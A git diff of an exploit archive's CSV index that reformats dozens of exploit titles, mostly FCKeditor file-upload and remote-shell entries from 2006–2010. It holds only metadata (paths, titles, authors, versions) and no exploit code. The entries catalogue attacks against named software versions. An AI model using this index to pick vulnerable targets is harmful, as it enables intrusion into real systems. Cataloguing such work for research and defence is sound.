diff --git a/files.csv b/files.csv
index 4f0fc6243..916f0fa17 100755
--- a/files.csv
+++ b/files.csv
@@ -1226,7 +1226,7 @@ id,file,description,date,author,platform,type,port
 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
-1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 (connector.php) - Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
+1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
 1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit (Multiple Targets)",2006-02-10,"Gotfault Security",linux,remote,1589
@@ -1671,7 +1671,7 @@ id,file,description,date,author,platform,type,port
 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0
 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
-1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
+1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
 1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
@@ -1740,7 +1740,7 @@ id,file,description,date,author,platform,type,port
 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0
 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
-2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
+2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0
 2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0
 2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0
@@ -2394,7 +2394,7 @@ id,file,description,date,author,platform,type,port
 2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0
 2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include Vulnerability",2006-11-02,GregStar,php,webapps,0
 2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
-2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
+2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 - (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
 2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0
 2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
 2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
@@ -5241,7 +5241,7 @@ id,file,description,date,author,platform,type,port
 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
 5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0
 5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0
-5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
+5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
@@ -5310,16 +5310,16 @@ id,file,description,date,author,platform,type,port
 5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
 5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection Vulnerability",2008-05-28,HER0,php,webapps,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0
-5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
+5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0
 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0
-5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
+5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0
 5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0
 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623
 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800
 5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0
-5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
+5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
 5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection Vulnerability",2008-05-30,K-159,php,webapps,0
 5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0
 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0
@@ -5390,7 +5390,7 @@ id,file,description,date,author,platform,type,port
 5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0
 5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0
 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0
-5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
+5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
 5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0
 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0
 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 (xss/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
@@ -5463,7 +5463,7 @@ id,file,description,date,author,platform,type,port
 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion Vulnerability",2008-06-17,"CWH Underground",php,webapps,0
 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
 5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0
-5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
+5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability",2008-06-17,Stack,php,webapps,0
 5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 (index.php site) SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability",2008-06-17,Cr@zy_King,php,webapps,0
@@ -5525,7 +5525,7 @@ id,file,description,date,author,platform,type,port
 5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 (header.php) Local File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
 5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0
 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
-5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
 5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability",2008-06-23,SxCx,php,webapps,0
 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0
 5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) Remote SQL Injection Vulnerability",2008-06-23,Mr.SQL,php,webapps,0
@@ -5540,8 +5540,8 @@ id,file,description,date,author,platform,type,port
 5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
 5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 (rfi/lfi/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0
-5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
-5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
 5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems <= 3.0 (listing_id) SQL Injection Vuln",2008-06-24,K-159,php,webapps,0
 5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0
 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
@@ -5562,7 +5562,7 @@ id,file,description,date,author,platform,type,port
 5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 (sql/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability",2008-06-26,boom3rang,php,webapps,0
 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
-5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
+5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
 5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
 5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
@@ -5620,7 +5620,7 @@ id,file,description,date,author,platform,type,port
 6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple Remote SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0
 6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability",2008-07-04,SsEs,php,webapps,0
 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0
-6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
+6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities Exploit",2008-07-05,BlackH,php,webapps,0
 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0
 6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0
@@ -5927,7 +5927,7 @@ id,file,description,date,author,platform,type,port
 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability",2008-09-01,Stack,php,webapps,0
 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability",2008-09-01,e.wiZz!,php,webapps,0
 6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection Vulnerability",2008-09-01,"BorN To K!LL",php,webapps,0
-6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
+6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
 6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0
 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0
 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability",2008-09-02,MustLive,php,webapps,0
@@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
 6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0
 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 (upload/sql/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0
-6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
+6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
 6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection Vulnerability",2008-09-03,"Hussin X",php,webapps,0
 6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0
 6363,platforms/php/webapps/6363.txt,"qwicsite pro (sql/XSS) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
@@ -5987,14 +5987,14 @@ id,file,description,date,author,platform,type,port
 6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0
 6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) Remote SQL Injection Vulnerability",2008-09-09,"security fears team",php,webapps,0
 6409,platforms/php/webapps/6409.txt,"Availscript Article Script (articles.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
-6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
+6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
 6411,platforms/php/webapps/6411.txt,"Availscript Photo Album (pics.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
 6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script (viewprofile.php) SQL Injection Vulnerability",2008-09-09,Stack,php,webapps,0
 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0
 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
 6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0
 6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script (jid) SQL Injection Vulnerability (auth)",2008-09-10,InjEctOr5,php,webapps,0
-6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite / Jaw Portal free (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
+6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
 6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
 6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0
@@ -6021,7 +6021,7 @@ id,file,description,date,author,platform,type,port
 6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor Vulnerability",2008-09-12,mr.al7rbi,php,webapps,0
 6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability",2008-09-12,FIREH4CK3R,php,webapps,0
 6447,platforms/php/webapps/6447.txt,"pNews 2.03 (newsid) Remote SQL Injection Vulnerability",2008-09-12,r45c4l,php,webapps,0
-6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
+6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 - (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
 6449,platforms/php/webapps/6449.php,"pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0
 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
@@ -6143,7 +6143,7 @@ id,file,description,date,author,platform,type,port
 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX BoF Exploit (meta)",2008-09-25,"Kevin Finisterre",windows,remote,0
 6571,platforms/php/webapps/6571.txt,"openengine <= 2.0 beta4 - Remote File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0
-6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
+6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0
 6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 (class_dir) Remote File Inclusion Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
 6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability",2008-09-26,"CWH Underground",php,webapps,0
@@ -6348,7 +6348,7 @@ id,file,description,date,author,platform,type,port
 6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection Vulnerability",2008-10-18,"Hussin X",php,webapps,0
 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0
 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0
-6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
+6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader <= 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0
 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability",2008-10-19,NoGe,php,webapps,0
 6786,platforms/solaris/remote/6786.pl,"Solaris 9 [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111
@@ -6710,7 +6710,7 @@ id,file,description,date,author,platform,type,port
 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 (API_HOME_DIR) RFI Vulnerability",2008-11-18,"Ghost Hacker",php,webapps,0
 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling Vulnerability",2008-11-18,x0r,php,webapps,0
 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
-7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
+7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0
 7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0
 7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0
@@ -7586,7 +7586,7 @@ id,file,description,date,author,platform,type,port
 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS Vulnerability",2009-02-16,rAWjAW,php,webapps,0
 8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0
 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0
-8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
+8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
 8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0
 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/XSS) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
 8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
@@ -10766,7 +10766,7 @@ id,file,description,date,author,platform,type,port
 11768,platforms/php/webapps/11768.txt,"Newbie CMS File Disclosure Vulnerability",2010-03-15,JIKO,php,webapps,0
 11769,platforms/hardware/dos/11769.py,"iPhone Springboard Malformed Character Crash PoC",2010-03-15,"Chase Higgins",hardware,dos,0
 11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST DoS",2010-03-16,dmnt,linux,dos,21
-11771,platforms/php/webapps/11771.txt,"osCMax 2.0 (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
